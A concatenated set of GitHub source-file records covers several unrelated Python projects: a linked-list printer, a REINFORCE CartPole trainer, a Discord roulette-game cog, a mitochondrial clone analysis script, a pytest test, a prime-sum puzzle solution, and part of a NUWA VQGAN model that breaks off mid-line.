else:\n print(temp.val)\n temp = temp.next\n print(\"\")\n\n def list_print_tail(tail: \"DoubleListNode\"):\n temp = tail\n while temp != None:\n if temp.prev != None:\n print(temp.val, end=\"<-\")\n else:\n print(temp.val)\n temp = temp.prev\n print(\"\")\n","repo_name":"Gunjan7991/coding_problem_solving","sub_path":"python_solver/dataStructure/dll.py","file_name":"dll.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"32278712554","text":"import sys\nimport torch\nimport gym\nimport numpy as np\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport matplotlib.pyplot as plt\n\nGAMMA = 0.9 # We care about long term rewards\nALPHA = 0.1\nEPSILON = 0.1\nMAX_NUM_EPISODES = 1000\nMAX_STEPS = 10000\nSHOULD_RENDER = False\n\n\"\"\"\nSummary of required packages: \npython3 -m pip install torch, gym, numpy, matplotlib\n\nReferences\nYoon blog: https://medium.com/@thechrisyoon/deriving-policy-gradients-and-implementing-reinforce-f887949bd63\nPyTorch examples: https://github.com/pytorch/examples/blob/master/reinforcement_learning/reinforce.py\n\"\"\"\n\n#\n# Neural Network Setup\n# The architecture of this network is the following:\n# a 1 layer network (remember that we don't include the output layer in the count)\n# Data enters a fully connected input layer passes through relu activation. A second fully\n# connected layer takes its outputs and passes through softmax activation to yield probabilities\n# for multiple actions.\n# We use Adam (or Adaptive Moments Estimation) optimization because it is memory efficient and requires\n# little tuning.\nclass PolicyNetwork(nn.Module):\n # All of the components of our network are here\n def __init__(self, num_inputs, num_actions, hidden_size, learning_rate=3e-4):\n super(PolicyNetwork, self).__init__()\n\n self.num_actions = num_actions\n self.linear1 = nn.Linear(num_inputs, hidden_size)\n self.linear2 = nn.Linear(hidden_size, num_actions)\n self.optimizer = optim.Adam(self.parameters(), lr=learning_rate)\n\n # The structure of the network is here\n def forward(self, state):\n x = F.relu(self.linear1(state))\n # We use softmax at the last layer in order to output probabilities (regress)\n actionProbs = F.softmax(self.linear2(x), dim=1)\n return actionProbs\n\n def get_action(self, state):\n state = torch.from_numpy(state).float().unsqueeze(0)\n probs = self.forward(Variable(state))\n highest_prob_action = np.random.choice(self.num_actions, p=np.squeeze(probs.detach().numpy()))\n log_prob = torch.log(probs.squeeze(0)[highest_prob_action])\n return highest_prob_action, log_prob\n\n#\n# Network training\n#\ndef update_policy(policy_network, rewards, log_probs):\n discounted_rewards = []\n\n # Compute discounted future rewards for all time steps\n for t in range(len(rewards)):\n Gt = 0\n pw = 0\n for r in rewards[t:]:\n Gt = Gt + GAMMA ** pw * r\n pw = pw + 1\n discounted_rewards.append(Gt)\n\n # Normalize discounted rewards: center and confine to some range, in this case the mean\n # Q: why use std instead of max or some other finite measure? Rewards outside of std will\n # have value 1+ or 1-\n # A: The main purpose of doing this normalization is to avoid unstable/noisy gradients. The\n # subtraction of the mean is the primary action that mitigates high variance in grads.\n discounted_rewards = torch.tensor(discounted_rewards)\n discounted_rewards = (discounted_rewards - discounted_rewards.mean()) / (\n discounted_rewards.std() + 1e-9)\n\n policy_gradient = []\n for log_prob, Gt in zip(log_probs, discounted_rewards):\n policy_gradient.append(-log_prob * Gt)\n\n policy_network.optimizer.zero_grad()\n policy_gradient = torch.stack(policy_gradient).sum()\n policy_gradient.backward()\n policy_network.optimizer.step()\n\n\ndef main():\n env = gym.make('CartPole-v0')\n policy_net = PolicyNetwork(env.observation_space.shape[0], env.action_space.n, 128)\n\n numsteps = []\n avg_numsteps = []\n all_rewards = []\n\n for episode in range(MAX_NUM_EPISODES):\n state = env.reset()\n log_probs = []\n rewards = []\n\n for steps in range(MAX_STEPS):\n if SHOULD_RENDER:\n env.render()\n\n action, log_prob = policy_net.get_action(state)\n new_state, reward, done, _ = env.step(action)\n log_probs.append(log_prob)\n rewards.append(reward)\n\n if done:\n update_policy(policy_net, rewards, log_probs)\n numsteps.append(steps)\n avg_numsteps.append(np.mean(numsteps[-10:]))\n all_rewards.append(np.sum(rewards))\n if episode % 1 == 0:\n totalReward = np.round(np.sum(rewards), decimals=3)\n meanReward = np.round(np.mean(all_rewards[-10:]), decimals=3)\n info = f\"episode: {episode}, total reward: {totalReward},\"\n info += f\"average_reward: {meanReward}, length: {steps}\\n\"\n sys.stdout.write(info)\n break\n\n state = new_state\n\n plt.plot(numsteps)\n plt.plot(avg_numsteps)\n plt.xlabel(\"Episode\")\n plt.ylabel(\"Time steps\")\n plt.show()\n\nif __name__ == \"__main__\":\n main()","repo_name":"bilkitty/LearningOnTheSide","sub_path":"algo/policygradients/reinforce.py","file_name":"reinforce.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"26150768778","text":"import itertools\r\nimport logging\r\nimport random\r\nfrom typing import TYPE_CHECKING\r\n\r\nfrom discord import Enum, Guild, Member, User\r\nfrom discord.ext import commands\r\nfrom discord.ext.commands import Context\r\n\r\nfrom ..util import TTLCache\r\n\r\nfrom . import register_handlers\r\nfrom ..bot import Tabby, TabbyCog\r\n\r\n\r\nif TYPE_CHECKING:\r\n from discord.abc import MessageableChannel\r\n\r\n\r\nLOGGER = logging.getLogger(__name__)\r\n\r\n\r\nclass Silly(TabbyCog):\r\n _ongoing: TTLCache[\"Guild | MessageableChannel\", \"Roulette\"]\r\n\r\n def __init__(self, bot: Tabby) -> None:\r\n super().__init__(bot)\r\n self._ongoing = TTLCache(expiry=60 ** 2)\r\n\r\n def _roulette_for(self, ctx: Context) -> \"Roulette\":\r\n key = ctx.guild or ctx.channel\r\n\r\n return self._ongoing.setdefault(key, Roulette(6))\r\n\r\n @commands.group(invoke_without_command=True)\r\n async def roulette(self, ctx: Context):\r\n \"\"\"Play a game of Russian Roulette in the current server\r\n\r\n This command simulates a revolving cylinder, so your odds get worse the longer you go on. Once the cylinder is\r\n empty, you can reload it with the \"reload\" subcommand, or swap to a cylinder of a different size using the\r\n \"swap\" subcommand.\r\n\r\n The state of the cylinder is shared between the entire server, so you can duel with your friends, if you're\r\n feeling suitably impulsive. Try not to lose your head!\r\n \"\"\"\r\n\r\n revolver = self._roulette_for(ctx)\r\n result = revolver.fire()\r\n\r\n if result is Chamber.empty:\r\n plural = \"s\" * (revolver.remaining != 1)\r\n return await ctx.send(f\"*Click*. {revolver.remaining} chamber{plural} left.\")\r\n\r\n await ctx.send(\"**Bang**! The cylinder is now empty.\")\r\n\r\n @roulette.command()\r\n async def reload(self, ctx: Context):\r\n \"\"\"Reload the cylinder, and play again.\"\"\"\r\n\r\n revolver = self._roulette_for(ctx)\r\n revolver.reload()\r\n\r\n await ctx.send(f\"Reloaded the cylinder. {revolver.capacity} chambers left.\")\r\n\r\n @roulette.command()\r\n async def swap(self, ctx: Context, chambers: int):\r\n \"\"\"Swap to a cylinder of a different size, and play again.\"\"\"\r\n\r\n key = ctx.guild or ctx.channel\r\n self._ongoing[key] = Roulette(chambers)\r\n\r\n await ctx.send(f\"Swapped to a cylinder with {chambers} chambers.\")\r\n\r\n\r\nclass Chamber(Enum):\r\n empty = False\r\n bullet = True\r\n\r\n\r\nclass Roulette:\r\n _chambers: list[Chamber]\r\n _capacity: int\r\n\r\n def __init__(self, capacity: int) -> None:\r\n if capacity <= 1:\r\n plural = \"s\" * (capacity != 1)\r\n\r\n raise RouletteError(f\"Nobody sane has manufactured a revolver with {capacity} chamber{plural}.\")\r\n\r\n self._capacity = capacity\r\n self.reload()\r\n\r\n @property\r\n def capacity(self) -> int:\r\n return self._capacity\r\n\r\n @property\r\n def remaining(self) -> int:\r\n return len(self._chambers)\r\n\r\n def reload(self) -> None:\r\n self._chambers = [Chamber.bullet, *itertools.repeat(Chamber.empty, self._capacity - 1)]\r\n random.shuffle(self._chambers)\r\n\r\n def fire(self) -> Chamber:\r\n if not self._chambers:\r\n raise RouletteError(\"The cylinder is empty.\")\r\n\r\n result = self._chambers.pop()\r\n\r\n if result is Chamber.bullet:\r\n self._chambers = []\r\n\r\n return result\r\n\r\n\r\nclass RouletteError(Exception):\r\n pass\r\n\r\n\r\nregister_handlers()\r\n","repo_name":"kaylynn234/tabby","sub_path":"tabby/ext/silly.py","file_name":"silly.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"26347085009","text":"\"\"\"\nMQuad filtering without the need for an elbow heuristics.\n\"\"\"\n\n# Code\nimport os\nimport warnings\nfrom sklearn.metrics import normalized_mutual_info_score\nimport matplotlib\nfrom matplotlib.colors import ListedColormap\nwarnings.filterwarnings('ignore')\n\nfrom mito_utils.preprocessing import *\nfrom mito_utils.utils import *\nfrom mito_utils.preprocessing import *\nfrom mito_utils.dimred import *\nfrom mito_utils.distances import *\nfrom mito_utils.clustering import *\nfrom mito_utils.it_diagnostics import *\nfrom mito_utils.it_iterations import *\nfrom mito_utils.plotting_base import *\nfrom mito_utils.embeddings_plots import *\nfrom mito_utils.heatmaps_plots import plot_heatmap\nmatplotlib.use('macOSX')\n\n\n# Args\npath_main = '/Users/IEO5505/Desktop/mito_bench'\nsample = 'MDA_PT'\n\n# Paths\npath_data = os.path.join(path_main, 'data') \npath_output = os.path.join(path_main, 'results', 'unsupervised_clones', 'output')\npath_viz = os.path.join(path_main, 'results', 'unsupervised_clones', 'visualization')\npath_tmp = os.path.join(path_main, 'results', 'unsupervised_clones', 'downstream_files')\n\n\n##\n\n# Load\nafm = read_one_sample(path_data, sample, with_GBC=True)\na_cells = filter_cells_coverage(afm)\na_cells = filter_baseline(a_cells)\n\nt = .75\ngt_l = [\n rank_clone_variants(\n a_cells, var='GBC', group=g, rank_by='custom_perc_tresholds',\n min_clone_perc=t, max_perc_rest=.25\n ).assign(clone=g)\n for g in a_cells.obs['GBC'].unique()\n]\ndf_gt = pd.concat(gt_l).join(summary_stats_vars(a_cells))\n\n# Filter \nvois_df = (\n df_gt\n .query('n_cells_clone>10')\n .sort_values('log2_perc_ratio', ascending=False)\n .loc[:, \n [\n 'median_AF_clone', 'median_AF_rest', 'perc_clone', \n 'perc_rest', 'log2_perc_ratio', 'n_cells_clone', 'clone'\n ]\n ]\n)\nvois = vois_df.index.unique()\ncells = a_cells.obs['GBC'].loc[lambda x: x.isin(vois_df['clone'])].index\n\n\n# UMAP and visualization\na_good = filter_cells_and_vars(a_cells, cells=cells, variants=vois)[0]\na_good = nans_as_zeros(a_good)\nX_umap = reduce_dimensions(a_good, 'UMAP', metric='cosine', n_comps=2)\n\ndf_ = (\n pd.DataFrame(X_umap[0], columns=X_umap[1], index=cells)\n .join(a_cells.obs)\n)\ndf_['GBC'] = df_['GBC'].astype('str')\n\nfig, ax = plt.subplots(figsize=(4.8,5))\ndraw_embeddings(\n df_, cat='GBC', ax=ax, \n axes_kwargs={'legend':False},\n title=f'MDA_PT, only recoverable cells and GT variants ({100 * cells.size / a_cells.shape[0]:.2f}%)',\n legend_kwargs={'loc':'center left', 'bbox_to_anchor':(1,.5)}\n)\nfig.tight_layout()\nplt.show()\n\n\n##\n\n\n# UMAP and visualization\na_miller = filter_cells_and_vars(a_cells, filtering='miller2022')[0]\na_miller = nans_as_zeros(a_miller)\nX_umap = reduce_dimensions(a_miller, 'UMAP', metric='cosine', n_comps=2)\n\ndf_ = (\n pd.DataFrame(X_umap[0], columns=X_umap[1], index=a_miller.obs_names)\n .join(a_cells.obs)\n)\ndf_['GBC'] = df_['GBC'].astype('str')\n\nfig, ax = plt.subplots(figsize=(4.8,5))\ndraw_embeddings(\n df_, cat='GBC', ax=ax, \n axes_kwargs={'legend':False},\n title=f'MDA_PT, all cells, miller2022 variants',\n legend_kwargs={'loc':'center left', 'bbox_to_anchor':(1,.5)}\n)\nfig.tight_layout()\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nimport cassiopeia as cs\n\n\nM = pd.DataFrame(\n np.where(a_good.X>.1, 1, 0),\n index=a_good.obs_names,\n columns=a_good.var_names\n)\n\nD = pd.DataFrame(\n pair_d(a_good, metric='cosine'),\n index=a_good.obs_names,\n columns=a_good.obs_names\n)\n\ntree = cs.data.CassiopeiaTree(\n character_matrix=M, \n dissimilarity_map=D, \n cell_meta=a_good.obs\n)\nsolver = cs.solver.UPGMASolver()\n# solver = cs.solver.NeighborJoiningSolver(add_root=True)\n# solver = cs.solver.ILPSolver()\n# solver = cs.solver.VanillaGreedySolver()\nsolver.solve(tree)\n\n\n\ndir(tree)\ntree\n\ntree.cell_meta = pd.DataFrame(\n a_cells.obs.loc[tree.leaves, \"GBC\"].astype(str)\n)\nto_plot = vois_df.sort_values('n_cells_clone', ascending=False).index[:6]\ntree.cell_meta[to_plot] = a_good[tree.leaves, to_plot].X.toarray()\n\nfig, ax = plt.subplots(figsize=(8,8))\ncs.pl.plot_matplotlib(\n tree, meta_data=[to_plot[0], \"GBC\"], \n categorical_cmap=ListedColormap(sc.pl.palettes.godsnot_102), \n continuous_cmap='mako',\n add_root=True,\n ax=ax\n)\nformat_ax(ax, title=f'Jaccard distance, ILP')\n# format_ax(ax, title=f'MDA_PT, all cells, miller2022 variants')\nplt.show()\n\n\nlen(tree.leaves) / a_cells.shape[0]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nfrom Bio.Phylo.Consensus import bootstrap\n\n\n\n\n\n\n\n\n\nprobability_threshold = 0.05\n\ncs.tl.compute_expansion_pvalues(tree, min_clade_size=(0.05 * tree.n_cell), min_depth=6)\nexpanding_nodes = []\nfor node in tree.depth_first_traverse_nodes():\n if tree.get_attribute(node, \"expansion_pvalue\") < probability_threshold:\n expanding_nodes.append(node)\n\n\nmake_folder(path_viz, 'trees', overwrite=True)\n\nfor i in range(len(expanding_nodes)):\n fig, ax = plt.subplots(figsize=(9,9))\n cs.pl.plot_matplotlib(\n tree, meta_data=[\"GBC\"], \n categorical_cmap=ListedColormap(sc.pl.palettes.godsnot_102), \n clade_colors={expanding_nodes[i]: \"red\"},\n add_root=True,\n ax=ax\n )\n fig.tight_layout()\n fig.savefig(os.path.join(path_viz, 'trees', f'clone_{i}.png'))\n\n\n\n\n# Association\n\n\ncs.tl.compute_morans_i(tree, meta_columns=[to_plot[1]])\n\n\n\nfrom scipy.stats import f_oneway\n\n\n# Perform the phylogenetic ANOVA (one-way ANOVA)\nanova_result = f_oneway(*tree.cell_meta['GBC'].astype('category').cat.codes)\n\n# Print the F-statistic and p-value\nprint(\"F-statistic:\", anova_result.statistic)\nprint(\"p-value:\", anova_result.pvalue)\n\n\n\n\n","repo_name":"andrecossa5/mito_unsupervised","sub_path":"iterative_scheme/MQuad_no_elbow.py","file_name":"MQuad_no_elbow.py","file_ext":"py","file_size_in_byte":5590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"34063557208","text":"from model.group import Group\nimport pytest\nfrom data.groups import testdata\n\ndef test_add_group(app, json_groups):\n group = json_groups\n old_groups = app.group.get_group_list()\n app.group.create(group)\n assert app.group.count() - len(old_groups) == 1\n new_groups = app.group.get_group_list()\n old_groups.append(group)\n assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)\n\n","repo_name":"tiptop32/python_for_testers","sub_path":"test/test_add_group.py","file_name":"test_add_group.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7085668256","text":"def main(n, k):\n MAX = 1200\n\n is_prime = [True] * (MAX + 10)\n primes = set()\n primes_list = []\n\n def sieve():\n nonlocal is_prime, primes, MAX, primes_list\n for i in range(2, MAX // 2):\n is_prime[2 * i] = False\n for i in range(3, MAX):\n if is_prime[i]:\n primes.add(i)\n for j in range(i * i, MAX, i):\n if j > MAX:\n break\n is_prime[j] = False\n\n def f(u):\n nonlocal primes, is_prime, primes_list\n for i in range(len(primes_list) - 1):\n if primes_list[i] + primes_list[i + 1] + 1 == u:\n return True\n if primes_list[i] + primes_list[i + 1] + 1 > u:\n return False\n return False\n sieve()\n primes_list = sorted(list(primes))\n x = 0\n for i in range(2, n + 1):\n if i in primes:\n if f(i):\n x += 1\n if x >= k:\n return \"YES\"\n return \"NO\"\n\n(n, k) = map(int, input().split(' '))\nprint(main(n, k))\n","repo_name":"austinschwartz/Competitive-Programming","sub_path":"codeforces/0017A_-_Noldbach_problem/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"11419511031","text":"import math\nfrom math import sqrt\nfrom functools import partial\nimport torch\nfrom torch.autograd import grad as torch_grad\nfrom torch import nn, einsum\nfrom torch.autograd import grad\nfrom torch.optim import Adam\nimport torch.nn.functional as F\nimport torchvision\n\nfrom einops import rearrange, reduce, repeat\nfrom einops.layers.torch import Rearrange, Reduce\n\nfrom vector_quantize_pytorch import VectorQuantize as VQ\n\nfrom nuwa_pytorch.reversible import ReversibleSequence\nfrom nuwa_pytorch.reversible_video_audio import DualModalityReversibleSequence\n\nfrom unfoldNd import unfoldNd\n\n# constants\n\nMList = nn.ModuleList\n\n# helper functions\n\ndef exists(val):\n return val is not None\n\ndef default(val, d):\n return val if exists(val) else d\n\ndef cast_tuple(val, size = 1):\n return val if isinstance(val, tuple) else (val,) * size\n\ndef calc_same_padding(kernel_size, dilation = 1):\n return dilation * (kernel_size - 1) // 2\n\n# keyword argument helpers\n\ndef pick_and_pop(keys, d):\n values = list(map(lambda key: d.pop(key), keys))\n return dict(zip(keys, values))\n\ndef group_dict_by_key(cond, d):\n return_val = [dict(),dict()]\n for key in d.keys():\n match = bool(cond(key))\n ind = int(not match)\n return_val[ind][key] = d[key]\n return (*return_val,)\n\ndef string_begins_with(prefix, str):\n return str.startswith(prefix)\n\ndef group_by_key_prefix(prefix, d):\n return group_dict_by_key(partial(string_begins_with, prefix), d)\n\ndef groupby_prefix_and_trim(prefix, d):\n kwargs_with_prefix, kwargs = group_dict_by_key(partial(string_begins_with, prefix), d)\n kwargs_without_prefix = dict(map(lambda x: (x[0][len(prefix):], x[1]), tuple(kwargs_with_prefix.items())))\n return kwargs_without_prefix, kwargs\n\n# decorators\n\ndef eval_decorator(fn):\n def inner(model, *args, **kwargs):\n was_training = model.training\n model.eval()\n out = fn(model, *args, **kwargs)\n model.train(was_training)\n return out\n return inner\n\n# tensor helper functions\n\ndef log(t, eps = 1e-20):\n return torch.log(t.clamp(min = eps))\n\ndef sigmoid(t):\n return torch.where(t >= 0, 1 / (1 + torch.exp(-t)), t.exp() / (1 + t.exp()))\n\ndef gumbel_noise(t):\n noise = torch.zeros_like(t).uniform_(0, 1)\n return -log(-log(noise))\n\ndef gumbel_sample(t, temperature = 1., dim = -1):\n return ((t / temperature) + gumbel_noise(t)).argmax(dim = dim)\n\ndef safe_div(numer, denom, eps = 1e-6):\n return numer / (denom + eps)\n\ndef stable_softmax(t, dim = -1, alpha = 32 ** 2):\n t = t / alpha\n t = t - torch.amax(t, dim = dim, keepdim = True).detach()\n return (t * alpha).softmax(dim = dim)\n\ndef prob_mask_like(shape, prob, device):\n return torch.zeros(shape, device = device).float().uniform_(0, 1) < prob\n\ndef l2norm(t):\n return F.normalize(t, dim = -1)\n\ndef leaky_relu(p = 0.1):\n return nn.LeakyReLU(0.1)\n\n# gan losses\n\ndef hinge_discr_loss(fake, real):\n return (F.relu(1 + fake) + F.relu(1 - real)).mean()\n\ndef hinge_gen_loss(fake):\n return -fake.mean()\n\ndef bce_discr_loss(fake, real):\n return (-log(1 - sigmoid(fake)) - log(sigmoid(real))).mean()\n\ndef bce_gen_loss(fake):\n return -log(sigmoid(fake)).mean()\n\ndef grad_layer_wrt_loss(loss, layer):\n return grad(\n outputs = loss,\n inputs = layer,\n grad_outputs = torch.ones_like(loss),\n retain_graph = True\n )[0].detach()\n\ndef batch_process(t, fn, chunks = 10, dim = 0):\n chunks = [fn(t_chunk) for t_chunk in t.chunk(chunks, dim = dim)]\n return torch.cat(chunks, dim = dim)\n\ndef gradient_penalty(images, output, weight = 10):\n batch_size = images.shape[0]\n gradients = torch_grad(outputs = output, inputs = images,\n grad_outputs = torch.ones(output.size(), device = images.device),\n create_graph = True, retain_graph = True, only_inputs = True)[0]\n\n gradients = rearrange(gradients, 'b ... -> b (...)')\n return weight * ((gradients.norm(2, dim=1) - 1) ** 2).mean()\n\n# gradient control\n\ndef frac_gradient(t, frac):\n return t * frac + t.detach() * (1 - frac)\n\n# vqgan vae\n\nclass LayerNormChan(nn.Module):\n def __init__(\n self,\n dim,\n eps = 1e-5\n ):\n super().__init__()\n self.eps = eps\n self.g = nn.Parameter(torch.ones(1, dim, 1, 1))\n self.b = nn.Parameter(torch.zeros(1, dim, 1, 1))\n\n def forward(self, x):\n var = torch.var(x, dim = 1, unbiased = False, keepdim = True)\n mean = torch.mean(x, dim = 1, keepdim = True)\n return (x - mean) / (var + self.eps).sqrt() * self.g + self.b\n\nclass Discriminator(nn.Module):\n def __init__(\n self,\n dims,\n channels = 3,\n groups = 16,\n init_kernel_size = 5\n ):\n super().__init__()\n dim_pairs = zip(dims[:-1], dims[1:])\n\n self.layers = MList([nn.Sequential(nn.Conv2d(channels, dims[0], init_kernel_size, padding = init_kernel_size // 2), leaky_relu())])\n\n for dim_in, dim_out in dim_pairs:\n self.layers.append(nn.Sequential(\n nn.Conv2d(dim_in, dim_out, 4, stride = 2, padding = 1),\n nn.GroupNorm(groups, dim_out),\n leaky_relu()\n ))\n\n dim = dims[-1]\n self.to_logits = nn.Sequential( # return 5 x 5, for PatchGAN-esque training\n nn.Conv2d(dim, dim, 1),\n leaky_relu(),\n nn.Conv2d(dim, 1, 4)\n )\n\n def forward(self, x):\n for net in self.layers:\n x = net(x)\n\n return self.to_logits(x)\n\nclass ContinuousPositionBias(nn.Module):\n \"\"\" from https://arxiv.org/abs/2111.09883 \"\"\"\n\n def __init__(self, *, dim, heads, layers = 2):\n super().__init__()\n self.net = MList([])\n self.net.append(nn.Sequential(nn.Linear(2, dim), leaky_relu()))\n\n for _ in range(layers - 1):\n self.net.append(nn.Sequential(nn.Linear(dim, dim), leaky_relu()))\n\n self.net.append(nn.Linear(dim, heads))\n self.register_buffer('rel_pos', None, persistent = False)\n\n def forward(self, x):\n n, device = x.shape[-1], x.device\n fmap_size = int(sqrt(n))\n\n if not exists(self.rel_pos):\n pos = torch.arange(fmap_size, device = device)\n grid = torch.stack(torch.meshgrid(pos, pos, indexing = 'ij'))\n grid = rearrange(grid, 'c i j -> (i j) c')\n rel_pos = rearrange(grid, 'i c -> i 1 c') - rearrange(grid, 'j c -> 1 j c')\n rel_pos = torch.sign(rel_pos) * torch.log(rel_pos.abs() + 1)\n self.register_buffer('rel_pos', rel_pos, persistent = False)\n\n rel_pos = self.rel_pos.float()\n\n for layer in self.net:\n rel_pos = layer(rel_pos)\n\n bias = rearrange(rel_pos, 'i j h -> h i j')\n return x + bias\n\nclass GLUResBlock(nn.Module):\n def __init__(self, chan, groups = 16):\n super().__init__()\n self.net = nn.Sequential(\n nn.Conv2d(chan, chan * 2, 3, padding = 1),\n nn.GLU(dim = 1),\n nn.GroupNorm(groups, chan),\n nn.Conv2d(chan, chan * 2, 3, padding = 1),\n nn.GLU(dim = 1),\n nn.GroupNorm(groups, chan),\n nn.Conv2d(chan, chan, 1)\n )\n\n def forward(self, x):\n return self.net(x) + x\n\nclass ResBlock(nn.Module):\n def __init__(self, chan, groups = 16):\n super().__init__()\n self.net = nn.Sequential(\n nn.Conv2d(chan, chan, 3, padding = 1),\n nn.GroupNorm(groups, chan),\n leaky_relu(),\n nn.Conv2d(chan, chan, 3, padding = 1),\n nn.GroupNorm(groups, chan),\n leaky_relu(),\n nn.Conv2d(chan, chan, 1)\n )\n\n def forward(self, x):\n return self.net(x) + x\n\nclass VQGanAttention(nn.Module):\n def __init__(\n self,\n *,\n dim,\n dim_head = 64,\n heads = 8,\n dropout = 0.\n ):\n super().__init__()\n self.heads = heads\n self.scale = nn.Parameter(torch.ones(1, heads, 1, 1) * math.log(0.01))\n inner_dim = heads * dim_head\n\n self.dropout = nn.Dropout(dropout)\n self.post_norm = LayerNormChan(dim)\n\n self.cpb = ContinuousPositionBias(dim = dim // 4, heads = heads)\n self.to_qkv = nn.Conv2d(dim, inner_dim * 3, 1, bias = False)\n self.to_out = nn.Conv2d(inner_dim, dim, 1)\n\n def forward(self, x):\n h = self.heads\n height, width, residual = *x.shape[-2:], x.clone()\n\n q, k, v = self.to_qkv(x).chunk(3, dim = 1)\n\n q, k, v = map(lambda t: rearrange(t, 'b (h c) x y -> b h c (x y)', h = h), (q, k, v))\n\n q, k = map(l2norm, (q, k))\n\n sim = einsum('b h c i, b h c j -> b h i j', q, k) * self.scale.exp()\n\n sim = self.cpb(sim)\n\n attn = stable_softmax(sim, dim = -1)\n attn = self.dropout(attn)\n\n out = einsum('b h i j, b h c j -> b h c i', attn, v)\n out = rearrange(out, 'b h c (x y) -> b (h c) x y', x = height, y = width)\n out = self.to_out(out)\n\n return self.post_norm(out) + residual\n\nclass VQGanVAE(nn.Module):\n def __init__(\n self,\n *,\n dim,\n image_size,\n channels = 3,\n num_layers = 4,\n layer_mults = None,\n l2_recon_loss = False,\n use_hinge_loss = True,\n num_resnet_blocks = 1,\n vgg = None,\n vq_codebook_size = 512,\n vq_decay = 0.8,\n vq_commitment_weight = 1.,\n vq_kmeans_init = True,\n vq_use_cosine_sim = True,\n use_attn = True,\n attn_dim_head = 64,\n attn_heads = 8,\n resnet_groups = 16,\n attn_dropout = 0.,\n first_conv_kernel_size = 5,\n use_vgg_and_gan = True,\n **kwargs\n ):\n super().__init__()\n assert dim % resnet_groups == 0, f'dimension {dim} must be divisible by {resnet_groups} (groups for the groupnorm)'\n\n vq_kwargs, kwargs = groupby_prefix_and_trim('vq_', kwargs)\n\n self.image_size = image_size\n self.channels = channels\n self.num_layers = num_layers\n self.codebook_size = vq_codebook_size\n\n self.encoders = MList([])\n self.decoders = MList([])\n\n layer_mults = default(layer_mults, list(map(lambda t: 2 ** t, range(num_layers))))\n assert len(layer_mults) == num_layers, 'layer multipliers must be equal to designated number of layers'\n\n layer_dims = [dim * mult for mult in layer_mults]\n dims = (dim, *layer_dims)\n codebook_dim = layer_dims[-1]\n\n dim_pairs = zip(dims[:-1], dims[1:])\n\n append = lambda arr, t: arr.append(t)\n prepend = lambda arr, t: arr.insert(0, t)\n\n if not isinstance(num_resnet_blocks, tuple):\n num_resnet_blocks = (*((0,) * (num_layers - 1)), num_resnet_blocks)\n\n if not isinstance(use_attn, tuple):\n use_attn = (*((False,) * (num_layers - 1)), use_attn)\n\n assert len(num_resnet_blocks) == num_layers, 'number of resnet blocks config must be equal to number of layers'\n assert len(use_attn) == num_layers\n\n for layer_index, (dim_in, dim_out), layer_num_resnet_blocks, layer_use_attn in zip(range(num_layers), dim_pairs, num_resnet_blocks, use_attn):\n append(self.encoders, nn.Sequential(nn.Conv2d(dim_in, dim_out, 4, stride = 2, padding = 1), leaky_relu()))\n prepend(self.decoders, nn.Sequential(nn.Upsample(scale_factor = 2, mode = 'bilinear', align_corners = False), nn.Conv2d(dim_out, dim_in, 3, padding = 1), leaky_relu()))\n\n if layer_use_attn:\n prepend(self.decoders, VQGanAttention(dim = dim_out, heads = attn_heads, dim_head = attn_dim_head, dropout = attn_dropout))\n\n for _ in range(layer_num_resnet_blocks):\n append(self.encoders, ResBlock(dim_out, groups = resnet_groups))\n prepend(self.decoders, GLUResBlock(dim_out, groups = resnet_groups))\n\n if layer_use_attn:\n append(self.encoders, VQGanAttention(dim = dim_out, heads = attn_heads, dim_head = attn_dim_head, dropout = attn_dropout))\n\n prepend(self.encoders, nn.Conv2d(channels, dim, first_conv_kernel_size, padding = first_conv_kernel_size // 2))\n append(self.decoders, nn.Conv2d(dim, channels, 1))\n\n self.vq = VQ(\n dim = codebook_dim,\n codebook_size = vq_codebook_size,\n decay = vq_decay,\n commitment_weight = vq_commitment_weight,\n accept_image_fmap = True,\n kmeans_init = vq_kmeans_init,\n use_cosine_sim = vq_use_cosine_sim,\n **vq_kwargs\n )\n\n # reconstruction loss\n\n self.recon_loss_fn = F.mse_loss if l2_recon_loss else F.l1_loss\n\n # turn off GAN and perceptual loss if grayscale\n\n self.vgg = None\n self.discr = None\n self.use_vgg_and_gan = use_vgg_and_gan\n\n if not use_vgg_and_gan:\n return\n\n # preceptual loss\n\n if exists(vgg):\n self.vgg = vgg\n else:\n self.vgg = torchvision.models.vgg16(pretrained = True)\n self.vgg.classifier = nn.Sequential(*self.vgg.classifier[:-2])\n\n # gan related losses\n\n self.discr = Discriminator(dims = dims, channels = channels)\n\n self.discr_loss = hinge_discr_loss if use_hinge_loss else bce_discr_loss\n self.gen_loss = hinge_gen_loss if use_hinge_loss else bce_gen_loss\n\n @property\n def codebook(self):\n return self.vq.codebook\n\n def encode(self, fmap):\n for enc in self.encoders:\n fmap = enc(fmap)\n\n return self.vq(fmap)\n\n def decode(self, fmap):\n for dec in self.decoders:\n fmap = dec(fmap)\n\n return fmap\n\n @torch.no_grad()\n def get_video_indices(self, video):\n b, f, _, h, w = video.shape\n images = rearrange(video, 'b f ... -> (b f) ...')\n _, indices, _ = self.encode(images)\n return rearrange(indices, '(b f) ... -> b f ...', b = b)\n\n def forward(\n self,\n img,\n return_loss = False,\n return_discr_loss = False,\n return_recons = False\n ):\n batch, channels, height, width, device = *img.shape, img.device\n assert height == self.image_size and width == self.image_size, 'height and width 